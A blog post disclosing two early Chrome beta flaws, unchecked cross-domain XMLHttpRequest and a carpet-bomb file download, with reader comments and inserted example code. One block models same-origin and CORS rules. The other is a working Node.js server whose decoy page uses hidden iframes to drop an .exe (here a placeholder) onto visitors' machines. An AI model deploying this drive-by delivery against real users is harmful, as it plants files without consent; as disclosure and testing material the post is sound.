Security Issues in Chrome Browser


Google recently launched its own browser, Chrome. The browser looks good considering that this is a first beta release, but it shipped with some critical security weaknesses. The two security vulnerabilities I found in Chrome, with examples, are given below:
  1. Cross-Domain XMLHttpRequest Calls
  2. Carpet-Bomb Attack
Cross-Domain XMLHttpRequest Calls:
The XMLHttpRequest object is at the core of today's most exciting AJAX web applications, but writing client-side code that uses it can be tricky because of the restrictions browsers impose on it. Browsers do not let a page make XMLHttpRequest calls across domains: a page on yahoo.com cannot make an XMLHttpRequest to google.com. This restriction (the same-origin policy) exists for security: the browser attaches the user's cookies for the target site to the request, so whoever can read the response can read whatever the user is logged in to there. Chrome does not seem to adhere to this rule; it freely allows cross-domain calls. How can this be exploited? Say you are logged in to your Gmail account and then land on a web page I created. On that page I send an XMLHttpRequest to http://gmail.com/contacts (assume that URL returns the contact list) and post all of those contacts to a server of mine. That is just one example of how to exploit this; an attacker can do many other things with it, including cookie theft.
Here is an example that loads the address book of Rediff if the user is logged in to a Rediff account. Try this link in Chrome: if you are logged in to Rediffmail, clicking on "load" will actually load the contents of your Rediffmail address book. This will not work in Firefox or IE.
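The rule described above, modelled as an added example that is not code from the original post: three policies for a cross-domain XMLHttpRequest, "same-origin-only" (what the post says Firefox and IE enforce), "cors" (the opt-in Access-Control scheme the comments below mention, written with the standardized Access-Control-Allow-Origin header rather than the 2008 draft spelling), and "unrestricted" (the beta behaviour the post reports). The attacker page URL is an assumption, and http://gmail.com/contacts is the post's own assumed contacts URL. The credentials handling goes slightly beyond the post: a response that says `*` never covers a cookie-bearing request, which is exactly the kind of request the Gmail scenario depends on.

```javascript
// Added example, not code from the original post. Models the cross-domain
// XMLHttpRequest rule as three policies so the difference between "always
// allowed" and "allowed only with the owner's consent" is explicit.
// URLs below are assumptions for illustration.

// An origin is scheme + host + port. URL.host already drops default ports,
// so http://a.com:80/ and http://a.com/ compare equal.
function origin(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

function sameOrigin(pageUrl, targetUrl) {
  return origin(pageUrl) === origin(targetUrl);
}

// Does the target's response opt the requesting page in? Header names are
// case-insensitive, so normalize them before looking anything up.
function corsAllows(pageUrl, responseHeaders, withCredentials) {
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) h[k.toLowerCase()] = String(v).trim();
  const allow = h['access-control-allow-origin'];
  if (allow === undefined) return false;          // the owner never opted in
  if (allow === '*') return !withCredentials;     // wildcard never covers cookie-bearing requests
  if (allow !== origin(pageUrl)) return false;    // must name this exact origin
  return !withCredentials || h['access-control-allow-credentials'] === 'true';
}

// Can script running on pageUrl read the response of an XHR to targetUrl?
function responseReadable(policy, pageUrl, targetUrl, responseHeaders = {}, withCredentials = false) {
  if (sameOrigin(pageUrl, targetUrl)) return true;
  switch (policy) {
    case 'same-origin-only': return false;
    case 'cors': return corsAllows(pageUrl, responseHeaders, withCredentials);
    case 'unrestricted': return true;
    default: throw new Error(`unknown policy: ${policy}`);
  }
}

// The scenario from the post: a page under my control reads the contacts of a
// user who is logged in to Gmail. The request carries the user's cookies and
// the real response has no Access-Control header at all.
const ATTACKER_PAGE = 'http://attacker.example/';   // assumption
const CONTACTS_URL = 'http://gmail.com/contacts';   // the post's assumed URL

function contactsExposedUnder(policy) {
  return responseReadable(policy, ATTACKER_PAGE, CONTACTS_URL, {}, true);
}

// The legitimate case from the comments: codeinspections.com explicitly
// allows mallik.com, so mallik.com's page may read the response.
function mallikAllowedByCodeinspections() {
  return responseReadable('cors', 'http://mallik.com/', 'http://codeinspections.com/data.json',
    { 'Access-Control-Allow-Origin': 'http://mallik.com' });
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of ['same-origin-only', 'cors', 'unrestricted']) {
    console.log(`${p}: attacker page can read Gmail contacts = ${contactsExposedUnder(p)}`);
  }
  console.log(`cors: mallik.com allowed by codeinspections.com = ${mallikAllowedByCodeinspections()}`);
}
```

Run it with `node` to see the three policies side by side: only the unrestricted policy lets the attacker page read the contacts, while the opt-in case still works under "cors" because the owner named the requesting origin.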

Carpet Bomb Attack:
Traditional browsers like Firefox and IE prompt the user before downloading a file. Chrome does not want to bother its users with a prompt asking whether they want the download, so a site can write a file to the user's machine simply by having the user open a URL. The same carpet-bomb vulnerability existed earlier in Safari. Here is an example of how opening a URL can download an .exe file onto your desktop: try opening this link in Chrome and it will download a sample .exe file to the default download location.
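The delivery side of the download described above, as an added example that is not code from the original post: a small Node.js handler serves a landing page whose hidden iframes point at a path answered with `Content-Disposition: attachment`, which is what makes a browser save the response instead of rendering it. A browser that prompts (the Firefox/IE behaviour the post describes) gives the user a chance to refuse; one that saves silently drops the file into the download folder. Serving several frames at once is the "carpet bomb" variant that litters the folder, a generalization of the single-file link in the post. The host, paths, file name and the 64-byte placeholder payload are all assumptions; the detection helper at the end is the kind of check a filtering proxy or download manager could apply.

```javascript
// Added example, not code from the original post. Server side of a drive-by
// download: "/" returns a page with hidden iframes, each pointing at
// "/sample.exe", which is served as an attachment. Names and paths are
// assumptions for illustration.

// Constructed stand-in for a Windows executable: an 'MZ' header padded to
// 64 bytes. It is not a real program; it exists only so the response has a body.
const SAMPLE_EXE = Buffer.concat([Buffer.from('MZ'), Buffer.alloc(62)]);

// RFC 6266 attachment disposition: asks the browser to save, not display.
function downloadHeaders(filename, length) {
  return {
    'Content-Type': 'application/octet-stream',
    'Content-Disposition': `attachment; filename="${filename}"`,
    'Content-Length': String(length),
  };
}

// count > 1 reproduces the carpet-bomb variant: one page visit, many files.
function landingPage(downloadPath, count = 1) {
  const frames = [];
  for (let i = 0; i < count; i++) {
    frames.push(`<iframe src="${downloadPath}?n=${i}" style="display:none"></iframe>`);
  }
  return `<!doctype html><html><body><p>Nothing to see here.</p>\n${frames.join('\n')}\n</body></html>`;
}

// Plain (req, res) handler so it can be driven without a socket.
function handle(req, res) {
  const url = new URL(req.url, 'http://localhost');
  if (url.pathname === '/') {
    const body = landingPage('/sample.exe', 3);
    res.writeHead(200, { 'Content-Type': 'text/html; charset=utf-8', 'Content-Length': String(Buffer.byteLength(body)) });
    res.end(body);
  } else if (url.pathname === '/sample.exe') {
    res.writeHead(200, downloadHeaders('sample.exe', SAMPLE_EXE.length));
    res.end(SAMPLE_EXE);
  } else {
    res.writeHead(404, { 'Content-Type': 'text/plain' });
    res.end('not found');
  }
}

// Check a filtering proxy or download manager could apply before anything
// reaches disk: an attachment whose name ends in an executable extension.
const EXEC_EXT = /\.(exe|msi|scr|bat|cmd|com|pif)$/i;
function looksLikeExecutableDrop(headers) {
  const cd = headers['Content-Disposition'] || headers['content-disposition'] || '';
  const m = /attachment\s*;\s*filename\s*=\s*"?([^";]+)"?/i.exec(cd);
  return m !== null && EXEC_EXT.test(m[1]);
}

// Start listening only when asked; open http://localhost:<port>/ in the
// browser under test and count the prompts (or the files) you get.
function startServer(port = 8080) {
  const http = require('http');
  return http.createServer(handle).listen(port);
}
```

Call `startServer()` from a `node` REPL or a one-line script, then open the root URL in each browser: a browser that honours the attachment disposition without asking will save three copies of sample.exe with no user action beyond the page load.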

Microsoft has always been on the receiving end of criticism for building insecure products; Google seems to be no different when it comes to its core products. I hope Google fixes these vulnerabilities soon and releases the next version of Chrome.

Also Read: Google Fixes Security Issues in chrome and Updates Silently

8 comments:

  1. Firefox Rocks!

    I am very happy that there are bugs in chrome :).

    ReplyDelete
  2. Even google has the knack of inducing the reality distortion field like Apple when it comes to launching their products. :)

    ReplyDelete
Yes, Chrome does crash a lot too... guess that's why Google has tried to isolate crashes of tabs by starting a new process for each tab :P

    Chrome is far from perfect, but this is just the beginning. An interesting statistic would be the number of people who have switched their default browser to Chrome in the last week. Scary news for MS/FF.

    ReplyDelete
  4. I don't get how Cross Domain XMLHTTP Request is a security vulnerability.

    FF3 allows it:
    http://developer.mozilla.org/en/Cross-Site_XMLHttpRequest

    or are you saying that Chrome allows it blindly (means W3C Access Control standard is not followed) ?

    PS: Haven't tried chrome yet.

    ReplyDelete
  5. Seems I need to update myself:

    http://robert.accettura.com/blog/2008/03/26/cross-site-xmlhttprequest-xhr-removed-from-firefox-3/

It's removed from FF3. But I still don't see, if it's a W3C standard, how it would be considered a bug.

    ReplyDelete
  6. Hey Praveen,
FF3 is talking about controlled cross-site requests, as in: if a site mallik.com wants access to files on codeinspections.com, then the owner of codeinspections.com needs to send Access-Control: allow mallik.com as part of the HTTP response. So basically the owner has control over which sites to allow. But the bug in Chrome is that it freely allows everyone to make cross-site XMLHttpRequests.

    ReplyDelete
Anonymous 6:20 PM

You sure about the cross-domain XMLHttp?? Tried out your link in Chrome and got a permission denied in line 42 as expected. Too glaring a bug to be released with.. :)

    ReplyDelete
Google fixed cross-domain XMLHttpRequests. Read Here

    ReplyDelete